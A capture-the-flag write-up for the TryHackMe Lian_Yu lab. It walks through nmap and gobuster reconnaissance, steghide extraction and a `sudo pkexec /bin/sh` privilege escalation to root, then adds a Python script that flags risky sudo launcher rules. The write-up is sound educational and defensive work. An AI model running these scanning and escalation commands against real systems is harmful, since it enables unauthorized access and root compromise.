WriteUp — THM Lian_Yu

nmap -sC -sV -p- 10.10.61.139
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-13 12:51 EEST
Nmap scan report for 10.10.61.139
Host is up (0.055s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_ 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 41886/tcp status
| 100024 1 44506/tcp6 status
| 100024 1 49721/udp status
|_ 100024 1 55595/udp6 status
41886/tcp open status 1 (RPC #100024)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.11 seconds
gobuster -q -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.61.139/ dir
/island (Status: 301)
The Code Word is: </p><h2 style="color:white"> vigilante</h2>
seq -w 0 9999 > numbers.txt
gobuster -q -w numbers.txt -u http://10.10.61.139/island dir
/2100 (Status: 301)
<!-- you can avail your .ticket here but how?   -->
gobuster -q -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x ticket -u http://10.10.61.139/island/2100 dir
/green_arrow.ticket (Status: 200)
This is just a token to get into Queen's Gambit(Ship)


__REDACTED__
exiftool Leave_me_alone.png
ExifTool Version Number : 12.07
File Name : Leave_me_alone.png
Directory : .
File Size : 500 kB
File Modification Date/Time : 2020:10:13 14:39:01+03:00
File Access Date/Time : 2020:10:13 14:39:30+03:00
File Inode Change Date/Time : 2020:10:13 14:39:01+03:00
File Permissions : rw-r--r--
Error : File format error
steghide extract -sf aa.jpg 
Enter passphrase:
wrote extracted data to "ss.zip".
THM{__REDACTED__}
cat .Important 
What are you Looking for ?
root Privileges ?try to find Secret_Mission
find / -iname "*Secret_Mission" 2>/dev/null
/usr/src/Secret_Mission
sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
sudo pkexec /bin/sh
# whoami
root
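
The `sudo -l` output above is the finding a defender should care about: a sudoers rule for `pkexec` is in practice a rule for any command as root. As an added example (not part of the original write-up), this Python audit parses `sudo -l` output and flags such rules; the `LAUNCHERS` list and the function name are assumptions chosen for illustration.

```python
import re

# Binaries that exist to start another program: a sudo rule for one of them,
# without pinned arguments, covers every command. Illustrative list (assumption).
LAUNCHERS = {"pkexec", "env", "sudo", "su", "sh", "bash", "nice", "timeout"}

# Constructed sample: the `sudo -l` output shown in the write-up.
SAMPLE = """\
Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin
User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec
"""

# "(runas) TAG: TAG: cmd, cmd" as printed by `sudo -l`.
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")
USER = re.compile(r"User (\S+) may run the following commands")


def audit_sudo_l(text):
    """Return one finding per rule that grants unrestricted execution as root."""
    findings, user = [], None
    for line in text.splitlines():
        m = USER.match(line)
        if m:
            user = m.group(1)
            continue
        m = RULE.match(line)
        if not m or user is None:
            continue
        # Runas is "user[,user] [: group]"; only root (or ALL) targets matter here.
        runas = {u.strip() for u in m.group("runas").split(":")[0].split(",")}
        if not runas & {"root", "ALL"}:
            continue
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            path, _, args = cmd.partition(" ")
            name = path.rsplit("/", 1)[-1]
            # A launcher with pinned arguments is limited to those arguments.
            if path == "ALL" or (name in LAUNCHERS and not args):
                reason = ("any command as root" if path == "ALL"
                          else f"{name} starts arbitrary programs as root")
                findings.append({"user": user, "command": path, "reason": reason,
                                 "nopasswd": "NOPASSWD:" in m.group("tags")})
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE):
        print(finding)
```

The corrective action for a flagged rule is to grant the specific command (with its arguments) that the account needs instead of the launcher itself.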

Jari Laurila
